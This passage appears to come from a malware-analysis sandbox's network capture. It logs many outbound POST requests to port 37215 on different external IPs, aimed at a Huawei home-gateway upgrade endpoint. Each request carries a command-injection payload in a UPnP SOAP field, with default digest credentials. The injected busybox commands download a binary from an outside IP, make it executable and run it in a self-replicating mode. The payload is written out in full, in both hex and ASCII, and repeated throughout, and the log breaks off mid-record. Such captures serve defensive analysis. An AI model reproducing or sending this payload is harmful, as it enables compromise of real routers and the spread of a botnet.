2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1470192.168.2.1334722197.158.235.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.570122957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1471192.168.2.134457041.94.211.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.570137978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1472192.168.2.1341432157.198.179.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.570524931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1473192.168.2.1335002197.154.147.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.570628881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1474192.168.2.1352664197.40.134.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.570655107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1475192.168.2.1342612197.156.90.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.570676088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1476192.168.2.134044641.115.87.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.570693970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1477192.168.2.1349322150.161.184.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.570704937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1478192.168.2.1352880197.155.42.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.572534084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1479192.168.2.134556041.196.216.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.572582960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1480192.168.2.1347292157.54.67.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.572602987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
